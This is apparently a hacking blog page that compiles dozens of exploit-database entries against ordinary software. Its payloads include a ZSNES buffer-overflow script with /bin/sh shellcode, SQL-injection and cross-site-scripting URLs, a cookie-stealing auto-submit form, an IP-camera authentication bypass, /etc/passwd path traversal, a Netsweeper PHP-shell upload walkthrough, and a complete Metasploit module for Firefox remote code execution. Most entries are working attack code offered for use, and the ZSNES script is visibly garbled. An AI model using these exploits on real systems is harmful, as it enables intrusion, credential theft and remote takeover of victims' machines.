Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863582830

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Author: Juan Sacco - http://www.exploitpack.comp <jsacco@exploitpack.com>
# Tested on: GNU/Linux - Kali Linux 2.0
# Description: ZSNES v1.51 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.zsnes.com
# Kali Linux 2.0 package: 1.510+bz2-8 (/var/lib/apt/lists/http.kali.org_kali_dists_sana_main_binary-i386_Packages)
# MD5: 23c1e4d12b6b8895961a29f2fd91570b

def run():
  try:
    print "# ZSNES v1.51 Stack-BoF by Juan Sacco"
    print "# Wasting CPU clocks on unusable exploits"
    print "# This exploit is for educational purposes only"
    # Basic structure: JUNK + SHELLCODE + NOPS + EIP
    junk = "\x41"*8
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*589
    eip = "\x10\xf0\xff\xbf"

    subprocess.call(["zsnes", junk + shellcode + nops + eip])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "ZSNES not found!"
    else:
    print "Error executing exploit"
    raise

def howtousage():
  print "Sorry, something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
    print "Author: Juan Sacco (Runlvl)"
  except IndexError:
    howtousage()
run()
            
source: https://www.securityfocus.com/bid/56293/info

Inventory is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Inventory 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5)
http://www.example.com/inventory/addinventario.php?ref=555-555-0199@example.com'AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555- 0199@example.com' AND SLEEP(5) AND 'IgkP'='IgkP&factura=555-555-0199@example.com' AND SLEEP(5) AND 'CFdY'='CFdY
http://www.example.com/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5) AND 'wIUB'='wIUB
http://www.example.com/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://www.example.com/inventory/newinventario.php?sn=<script>alert(100)</script>
http://www.example.com/inventory/newtransact.php?ref=<script>alert(100)</script> 
            
source: https://www.securityfocus.com/bid/56223/info

SMF is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SMF 2.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/ssi_examples.php?view=[Xss] 
            
source: https://www.securityfocus.com/bid/56173/info

WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WHMCS 4.5.2 is vulnerable; other versions may also be affected. 

#Proof of Concept : 

<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<script>
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
    var http = new XMLHttpRequest();
 try {
        netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
    } catch (e) {
        alert("Permission UniversalBrowserRead denied.");
    }
    http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
    http.onreadystatechange = handleResponse;
    http.send(params);
function handleResponse() {

  if(http.readyState == 4 && http.status == 200){
    var response = http.responseText;
alert(response);
    }
  }  
</script>
</body>
</html>
            
source: https://www.securityfocus.com/bid/56159/info

The Wordfence Security plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Wordfence Security 3.3.5 is vulnerable; other versions may also be affected. 

<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
<input type="hidden" name="email" 
value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>
            
source: https://www.securityfocus.com/bid/56156/info

FirePass SSL VPN is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

Versions prior to FirePass 7.0.0 HF-70-7 and 6.1.0 HF-610-9 are vulnerable. 

http://www.example.com/my.activation.cns.php3?langchar=&ui_translation=&refreshURL==http://attacker 
            
source: https://www.securityfocus.com/bid/56148/info

CMS Mini is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

CMS Mini 0.2.2 is vulnerable; other versions may also be affected. 

http://www.example.com/view/index.php?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000A3)%3C/script%3E&p=cms.guestbook&msg=Message%20sent 
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=171&can=1

The following access violation was observed in Microsoft Office 2007
(Word document):

(8c0.e68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012dcf8 ebx=40000000 ecx=40000000 edx=0012de1c esi=40000000 edi=011f1400
eip=32881800 esp=0012d010 ebp=0012d038 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mso!Ordinal7799+0x2fc:
32881800 0fb74614         movzx eax,word ptr [esi+0x14] ds:0023:40000014=????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012d038 328a0a4e mso!Ordinal7799+0x2fc
0012ddd8 328a0a2c mso!Ordinal4388+0x1bc
0012dde4 320c337c mso!Ordinal4388+0x19a
0012de2c 320c330f wwlib!DllGetClassObject+0x850ba
0012de74 312db32b wwlib!DllGetClassObject+0x8504d
0012df1c 312dadf8 wwlib!FMain+0x96d7c
0012df84 312da84c wwlib!FMain+0x96849
0012e074 6be51b27 wwlib!FMain+0x9629d
0012e114 6be5c65b MSPTLS!FsDestroyMemory+0x1ee4e
0012e28c 6be5c94c MSPTLS!FsDestroyMemory+0x29982
0012e2d8 6be36d59 MSPTLS!FsDestroyMemory+0x29c73
0012e344 6be37f87 MSPTLS!FsDestroyMemory+0x4080
0012e450 6be4e8eb MSPTLS!FsDestroyMemory+0x52ae
0012e4e0 6be4f1ff MSPTLS!FsDestroyMemory+0x1bc12
0012e584 6be4f362 MSPTLS!FsDestroyMemory+0x1c526
0012e624 6be4f5cc MSPTLS!FsDestroyMemory+0x1c689
0012e7d8 6be35d9f MSPTLS!FsDestroyMemory+0x1c8f3
0012e8ec 6be630b5 MSPTLS!FsDestroyMemory+0x30c6
0012e970 6be40ee2 MSPTLS!FsDestroyMemory+0x303dc
0012e9e4 6be63a7a MSPTLS!FsDestroyMemory+0xe209

Notes:

- Reproduce on Windows Server 2003 and Windows 7.

- The crash occurs due to an invalid read dereference of a bad object
pointer. If the word value read is controlled and set to a value other
than 0xFFFF, then a controlled value is used as an indirect call
target (at 328A1DD4 in MSO.dll 12.0.6683.5000).

- The bad object pointer is passed in to MSO.dll from wwlib.dll
(second argument of function at 328A0A16 in MSO.dll 12.0.6683.5000).

- The test-case reduces to a 50-bit difference from the original
sample document.

- The affected bits lie in the OneTableDocumentStream's data section,
as well as as PlcfSed's aCP[0] field and PNFKPPAPX[44]'s pn field.

- The copy operation at 3126A36C (wwlib.dll 12.0.6707.5000) uses a
source buffer from the OneTableDocumentStream's data section, and
copies this invalid data into a stack buffer. The bad object pointer
comes from this stack-based structure.

- Attached files: 037542f7_crash.rtf (crashing file),
037542f7_orig.doc (original file). A test case with full control of
the crashing register value (0xAAAAAAAA) is also attached
(037542f7_full.doc)

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37966.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1

The following access violation was observed in Microsoft Office 2007
(Word document):

(e24.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0583a748 ebx=00eb4684 ecx=003ad1a3 edx=00000000 esi=049860bc edi=00122238
eip=7814500a esp=001221e0 ebp=001221e8 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
MSVCR80!memcpy+0x5a:
7814500a f3a5            rep  movsd ds:049860bc=???????? es:00122238=3348bcd8
0:000> k
ChildEBP RetAddr
001221e8 31249c0e MSVCR80!memcpy+0x5a
00122204 3126a371 wwlib!FMain+0x565f
00122220 3203de3c wwlib!FMain+0x25dc2
00122268 320dab4c wwlib!DllCanUnloadNow+0x56a6bb
00122280 31fc363f wwlib!DllGetClassObject+0x9c88a
0012229c 31f9acde wwlib!DllCanUnloadNow+0x4efebe
001222b4 31f9b0e5 wwlib!DllCanUnloadNow+0x4c755d
00122308 31bd68c2 wwlib!DllCanUnloadNow+0x4c7964
001223bc 3201a69b wwlib!DllCanUnloadNow+0x103141
00122a68 3129f4eb wwlib!DllCanUnloadNow+0x546f1a
00123b68 3129e8e5 wwlib!FMain+0x5af3c
00123bac 32073906 wwlib!FMain+0x5a336
00126d28 32073627 wwlib!DllGetClassObject+0x35644
0012b14c 32073294 wwlib!DllGetClassObject+0x35365
0012b19c 3209ac20 wwlib!DllGetClassObject+0x34fd2
0012e2f8 3208c781 wwlib!DllGetClassObject+0x5c95e
0012e31c 31314684 wwlib!DllGetClassObject+0x4e4bf
0012f580 320e04b7 wwlib!FMain+0xd00d5
0012f630 320e037f wwlib!DllGetClassObject+0xa21f5
0012f648 32812493 wwlib!DllGetClassObject+0xa20bd

Notes:

- Reproduces on Windows Server 2003 and Windows 7

- The crash occurs due to a memcpy with an invalid source buffer.

- The invalid source buffer is actually indicative of an invalid size
being used in a pointer calculation at 3126A360 (wwlib.dll
12.0.6707.5000). This invalid size can also be seen in ecx at the time
of access violation.

- The large size parameter can result in a stack-based buffer overflow.

- Alternatively, if the copy operation succeeds (by using a size value
large enough to result in an out-of-bounds source buffer, but not so
large to cause an access violation during copy), then it is also
possible to get an arbitrary free from later usage of controlled
pointers in the destination buffer.

- The crashing test case was created using a chunk reordering
strategy, and does not cleanly minimize (106 bit change from original
file).

- Attached files: 86ea4a3c_crash.rtf (crashing file),
86ea4a3c_orig.doc (original file)

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37967.zip
            
# Exploit Title: Keeper IP Camera - Authentication Bypass
# Date: 25/08/2015
# Exploit Author: RAT - ThiefKing
# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
# Version: 3.2.2.10
# WEB Version: 6.1.17.192
# Tested on: QB200W, QB130W, QA130W,...

Exploit:
1 - First, open your browser
2 - Enter the IP address or domain to see the login screen of the camera
3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)

You can change or view passwords

TEST: http://server:88/login.asp
-- 
RAT - ThiefKing
http://tromcap.com
            
/*
source: https://www.securityfocus.com/bid/56124/info

Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.

Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected. 
*/

HANDLE   hDevice;
    char *inbuff, *outbuff;
    DWORD ioctl, len,;
 
    if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
                                              0,
                                              0,
                                              0,
                                              OPEN_EXISTING,
                                              0,
                                              NULL) ) != INVALID_HANDLE_VALUE )
    {
            printf("Device succesfully opened!\n");
    }
    else
    {
            printf("Error: Error opening device \n");
            return 0;
    }
    inbuff = (char*)malloc(0x12000);
    if(!inbuff){
            printf("malloc failed!\n");
            return 0;
    }
    outbuff = (char*)malloc(0x12000);
    if(!outbuff){
            printf("malloc failed!\n");
            return 0;
    }
        ioctl = 0x2A04C0;
        memset(inbuff, 0x41, 0x70);    
        DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);
            
source: https://www.securityfocus.com/bid/56110/info
   
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
   
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
   
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. 

http://www.example.com/path_gallery/fullscreen.php?albumid=[SQLi] 
            
source: https://www.securityfocus.com/bid/56110/info
  
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
  
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. 

http://www.example.com/path_gallery/plist.php?albumid=[XSS] 
            
source: https://www.securityfocus.com/bid/56110/info
 
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
 
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. 

http://www.example.com/path_gallery/plist.php?albumid=[SQLi] 
            
source: https://www.securityfocus.com/bid/56110/info

Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.

Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. 

http://www.example.com/path_gallery/force-download.php?file=[RFD] 
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'Firefox PDF.js Privileged Javascript Injection',
      'Description' => %q{
        This module gains remote code execution on Firefox 35-36 by abusing a
        privilege escalation bug in resource:// URIs. PDF.js is used to exploit
        the bug. This exploit requires the user to click anywhere on the page to
        trigger the vulnerability.
      },
      'Author'         => [
        'Unknown', # PDF.js injection code was taken from a 0day
        'Marius Mlynski', # discovery and pwn2own exploit
        'joev'     # copypasta monkey, CVE-2015-0802
      ],
      'DisclosureDate' => "Mar 31 2015",
      'License'     => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2015-0816'], # pdf.js can load chrome://
          ['CVE', '2015-0802']  # can access messageManager property in chrome window
        ],
      'Targets' => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(35, 36) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    print_status('Sending exploit...')
    send_response_html(cli, html)
  end

  def html
    "<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+
    "<script>#{js}</script></body></html>"
  end

  def default_html
    "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
  end

  def js
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    frame = Rex::Text.rand_text_alpha(5 + rand(12))
    r = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin

    <<-EOJS
function xml2string(obj) {
  return new XMLSerializer().serializeToString(obj);
}

function __proto(obj) {
  return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
}

function get(path, callback, timeout, template, value) {
  callback = _(callback);
  if (template && value) {
    callback = callback.replace(template, value);
  }
  js_call1 = 'javascript:' + _(function() {
    try {
      done = false;
      window.onclick = function() {
        if (done) { return; } done = true;
        q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");
        setTimeout(function(){
          q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';

            setTimeout(function(){
              var opts = #{JSON.unparse(opts)};
              var key = opts['#{key}'];
              q.messageManager.loadFrameScript('data:,'+key, false);
              setTimeout(function(){
                q.close();
              }, 100)
            }, 100)
        }, 100);
      }
    } catch (e) {
      history.back();
    }
    undefined;
  }, "%url%", path);
  js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
  sandboxContext(_(function() {
    p = __proto(i.contentDocument.styleSheets[0].ownerNode);
    l = p.__lookupSetter__.call(i2.contentWindow, 'location');
    l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
  }));
  setTimeout((function() {
    sandboxContext(_(function() {
      p = __proto(i.contentDocument.styleSheets[0].ownerNode);
      l = p.__lookupSetter__.call(i2.contentWindow, 'location');
      l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
    }));
  }), timeout);
}

function get_data(obj) {
  data = null;
  try {
    data = obj.document.documentElement.innerHTML;
    if (data.indexOf('dirListing') < 0) {
      throw new Error();
    }
  } catch (e) {
    if (this.document instanceof XMLDocument) {
        data = xml2string(this.document);
    } else {
      try {
          if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
              data = this.document.body.firstChild.textContent;
          } else {
              throw new Error();
          }
      } catch (e) {
        try {
          if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
              return null;
          } else {
              throw new Error();
          }
        } catch (e) {
          ;;
        }
      }
    }
  }
  return data;
}

function _(s, template, value) {
  s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
  s = s.substring(0, s.length - 1);
  if (template && value) {
    s = s.replace(template, value);
  }
  s += __proto;
  s += xml2string;
  s += get_data;
  s = s.replace(/\\s\\/\\/.*\\n/g, "");
  s = s + ";undefined";
  return s;
}

function get_sandbox_context() {
  if (window.my_win_id == null) {
    for (var i = 0; i < 20; i++) {
      try {
        if (window[i].location.toString().indexOf("view-source:") != -1) {
          my_win_id = i;
          break;
        }
      } catch (e) {}
    }
  };
  if (window.my_win_id == null)
    return;
  clearInterval(sandbox_context_i);
  object.data = 'view-source:' + blobURL;
  window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
  object.data = 'data:text/html,<'+'html/>';
  window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
    '"position:absolute; left:-9999px;" onload = "'+_(function(){
    window.wrappedJSObject.sandboxContext=(function(cmd) {
      with(importFunction.constructor('return this')()) {
        return eval(cmd);
      }
    });
  }) + '"/>');
}

var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';
var i = document.createElement("iframe");
i.id = "i";
i.style=HIDDEN;
i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
document.documentElement.appendChild(i);
i.onload = function() {
  if (this.contentDocument.styleSheets.length > 0) {
    var i2 = document.createElement("iframe");
    i2.id = "i2";
    i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';
    i2.height = window.innerHeight+'px';
    i2.width = window.innerWidth+'px';
    i2.src = "data:application/pdf,";
    document.documentElement.appendChild(i2);
    pdfBlob = new Blob([''], {
        type: 'application/pdf'
    });
    blobURL = URL.createObjectURL(pdfBlob);
    object = document.createElement('object');
    object.style=HIDDEN;
    object.data = 'data:application/pdf,';
    object.onload = (function() {
        sandbox_context_i = setInterval(get_sandbox_context, 200);
        object.onload = null;
        object.data = 'view-source:' + location.href;
        return;
    });
    document.documentElement.appendChild(object);
  } else {
    this.contentWindow.location.reload();
  }
}

document.body.style.height = window.innerHeight+'px';

var kill = setInterval(function() {
  if (window.sandboxContext) {
    var f = "chrome://browser/content/browser.xul";
    get(f, function() {}, 0, "%URL%", f);
    clearInterval(kill);
  } else {
    return;
  }
},20);

EOJS
  end
end
            
********************************************************************************************
# Exploit Title: GOM Audio 2.0.8 Crash POC
# Date: 8/24/2015
# Exploit Author: Un_N0n
# Software Vendor : http://audio.gomlab.com/
# Software Link: http://audio.gomlab.com/download_log.gom
# Version: 2.0.8 (2015/06/17)
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- open 'Goma.exe'.
2- Goto Preference -> Manage -> Skins.
3- Click on ADD, Browse CRASH.gas in it.
~ Software will Crash.

[Code to produce crash.txt]: 
junk = "A"*66666
file = open("CRASH.gas",'w')
file.write(junk)
file.close()
**********************************************************************************************
            
source: https://www.securityfocus.com/bid/55891/info

FileContral is prone to a local file-include and a local file-disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to view and execute local files within the context of the webserver process, obtaining potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.

FileContral 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/Administrator/filemanager/filemanager.php?downfile=../../../../../etc/passwd
http://www.example.com/Administrator/filemanager/filemanager.php?downfile=../../../../../../etc/passwd
http://www.example.com/Administrator/filemanager/filemanager.php?downfile=server dir/public_html/lists/config/config.php 
            
source: https://www.securityfocus.com/bid/55860/info

OpenX is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

OpenX 2.8.10 is vulnerable; other versions may also be affected. 

http://www.example.com/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E [XSS] 
            
/*
source: https://www.securityfocus.com/bid/55855/info

The Linux kernel is prone to a local information-disclosure vulnerability.

Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
*/

/* Test for UNAME26 personality uname kernel stack leak.
 * Copyright 2012, Kees Cook <keescook@chromium.org>
 * License: GPLv3
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/personality.h>
#include <sys/utsname.h>

#define UNAME26 0x0020000

int dump_uts(void)
{
	int i, leaked = 0;
	struct utsname buf = { };

	if (uname(&buf)) {
		perror("uname");
		exit(1);
	}
	printf("%s\n", buf.release);

	for (i = strlen(buf.release) + 1; i < sizeof(buf.release); i++) {
		unsigned char c = (unsigned char)buf.release[i];

		printf("%02x", c);
		if (c)
			leaked = 1;
	}
	printf("\n");

	return leaked ? (i - (strlen(buf.release) + 1)) : 0;
}

int main(int ac, char **av)
{
	int leaked;

	leaked = dump_uts();
	if (leaked) {
		printf("Leaked %d bytes even without UNAME26!?\n", leaked);
		return 1;
	}


	if (personality(PER_LINUX | UNAME26) < 0) {
		perror("personality");
		exit(1);
	}

	leaked = dump_uts();
	if (leaked) {
		printf("Leaked %d bytes!\n", leaked);
		return 1;
	} else {
		printf("Seems safe.\n");
		return 0;
	}
}
            
source: https://www.securityfocus.com/bid/55834/info

Open Realty is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

Open Realty 2.5.6 is vulnerable; other versions may also be affected. 

http://www.example.com/open-realty2.5.6/index.php?select_users_lang=../../../../../../../boot.ini%00 
            
source: https://www.securityfocus.com/bid/55829/info

Interspire Email Marketer is prone to the following input-validation vulnerabilities because it fails to properly sanitize user-supplied input:

1. An SQL injection vulnerabilities
2. Multiple HTML injection vulnerabilities
3. A cross-site scripting vulnerability

Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Email Marketer 6.0.1 is vulnerable; other versions may be affected. 

http://www.example.com/admin/index.php?Page=Addons&Addon=dynamiccontenttags&; Action=Edit&id=-1%27+UNION+Select+1,2,3,4--%20- [SQLi]

http://www.example.com/admin/index.php?Page=Addons&Addon=dynamiccontenttags&; Action=Edit&id=-1%27+UNION+Select+1,version%28%29,3,4--%20-[SQLi]

http://www.example.com/admin/index.php?Page=Addons&Addon=
dynamiccontenttags&Action=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E [XSS] 
            
source: https://www.securityfocus.com/bid/55817/info

The Shopp plugin for WordPress is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attackers can exploit these issues to disclose sensitive information, steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the web server, and launch other attacks.

Shopp 1.0.17 is vulnerable; other versions may also be affected.

http://www.example.com/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xSS");//
http://www.example.com/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf
http://www.example.com/Shopp_v1.0.17/core/model/schema.sql 
            
+-----------------------------------------------------------------+
+ Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation) +
+-----------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version 	: 4.0.8 (and probably other versions)
Discovered by  	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched      	: Yes
CVE		: CVE-2014-9618

+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.

+----------------------+
+ Exploitation Details +
+----------------------+
Netsweeper's 4.0.8 (and probably other versions) Client Filter Admin portal can be reached at http://netsweeper/webadmin/clientlogin/ and a username/password combination is required to Add a Profile, by setting the "action" parameter to "showdeny" it will force the admin interface to load and subsequently allow any non-authenticated user to create a new profile.

URL Path: http://netsweeper/webadmin/clientlogin/?srid=&action=showdeny&url=

+----------+
+ Solution +
+----------+
Upgrade to latest version.

+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9618
11-Aug-2015: Public disclosure
            
+--------------------------------------------------------+
+ Netsweeper 4.0.8 - Arbitrary File Upload and Execution +
+--------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version 	: 4.0.8 (and probably other versions)
Discovered by  	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched      	: Yes
CVE		: CVE-2014-9619

+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.

+----------------------+
+ Exploitation Details +
+----------------------+
Netsweeeper 4.0.8 (and probably other versions) allows an authenticated user with admin privileges on the Cloud Manager web console, to upload arbitrary PHP code (eg PHP shell) and further execute it.

To replicate the bug, pipe the following request while being authenticated using admin privileges: http://netsweeper/webadmin/ajaxfilemanager/ajaxfilemanager.php

From the response page you can upload any GIF-lookalike php shell (remember to use basic evasion technique for file to upload successfully, hint: filename="secuid0.php.gif" with gif like header and php shell following)

Then, access your shell from: https://netsweeper/webadmin/deny/images/secuid0.php.gif and profit.

+----------+
+ Solution +
+----------+
Upgrade to latest version.

+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9619
